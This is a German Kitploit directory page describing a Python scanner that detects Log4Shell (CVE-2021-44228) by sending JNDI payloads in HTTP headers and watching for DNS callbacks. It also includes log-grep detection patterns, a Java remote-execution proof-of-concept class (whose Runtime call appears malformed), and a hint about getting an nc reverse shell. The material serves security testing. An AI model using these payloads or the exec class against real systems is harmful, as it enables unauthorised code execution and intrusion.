Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4j — Multithreaded-Python-Scanner, der Log4Shell (CVE-2021-44228) erkennt, indem er manipulierte HTTP-Anfragen mit JNDI-Payloads sendet und DNS-Callbacks überwacht, um verwundbare Hosts zu identifizieren. | Kitploit
Tools/GitHubGitHub/hassaanahmad813/log4j
SchwachstellenscannerExploitationInformationsbeschaffungWebsicherheitDNS-Analyse
GitHubhassaanahmad813/log4j

log4j

Multithreaded-Python-Scanner, der Log4Shell (CVE-2021-44228) erkennt, indem er manipulierte HTTP-Anfragen mit JNDI-Payloads sendet und DNS-Callbacks überwacht, um verwundbare Hosts zu identifizieren.

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

log4j-detect

Einfaches Python-3-Skript zur Erkennung der „Log4j“-Java-Bibliotheks-Schwachstelle (CVE-2021-44228) für eine Liste von URLs mit Multithreading

Dieses Skript basiert auf takito1812/log4j-detect

Von ExodataCyberdefense


Das in Python 3 entwickelte Skript „log4j-detect.py" ist dafür zuständig, zu erkennen, ob eine Liste von URLs anfällig für CVE-2021-44228 ist.

Dazu sendet es eine GET-Anfrage unter Verwendung von Threads (höhere Leistung) an jede der URLs in der angegebenen Liste. Die GET-Anfrage enthält eine Payload, die bei Erfolg eine DNS-Anfrage an Burp Collaborator / interactsh zurückgibt. Diese Payload wird in einem Testparameter und in den Headern „User-Agent" / „Referer" / „X-Forwarded-For" / „Authentication" gesendet. Wenn schließlich ein Host anfällig ist, erscheint eine Identifikationsnummer im Subdomain-Präfix der Burp-Collaborator-/interactsh-Payload und in der Ausgabe des Skripts, sodass bekannt ist, welcher Host über DNS geantwortet hat.

Es sollte beachtet werden, dass dieses Skript nur die DNS-Erkennung der Schwachstelle übernimmt und keine Remote-Befehlsausführung testet.

Ausführen von log4j-detect.py

root@kitploit:~
python3 log4j-detect.py -s <burpCollaborator/interactsh...> [-u [urls]] [-f [urlFileList]] [-t THREADS] [-p PROXY] [--urllib3-warnings|--no-urllib3-warnings]

imagen

Wenn Sie direkten Zugriff auf den Server haben, können Sie Folgendes ausführen:

root@kitploit:~
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://[^\n]+' /var/log
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[
s]?|rmi)://[^\n]+'

Um zu prüfen, ob jemand versucht hat, eine Verbindung über einen LDAP-Server herzustellen

Wenn das Skript eine Schwachstelle erkennt

Hier ist ein Beispielcode, den Sie starten können, um zu testen, ob Ihr Server kompromittiert werden kann (Wenn es sich um eine Windows-Shell handelt, können Sie einfach die PowerShell-Syntax verwenden)

root@kitploit:~
public class ExportObject implements javax.naming.spi.ObjectFactory {
	public ExportObject() {
		try {
			java.lang.getRuntime().exec("touch ~/pwned");
			java.lang.getRuntime().exec("ls ~");
		} catch (Exception e) {
			e.printStackTrace();
		}
	}
}

So etwas könnte Ihnen ermöglichen, mit dem Befehl nc eine Reverse-Shell zu erstellen

Tool herunterladen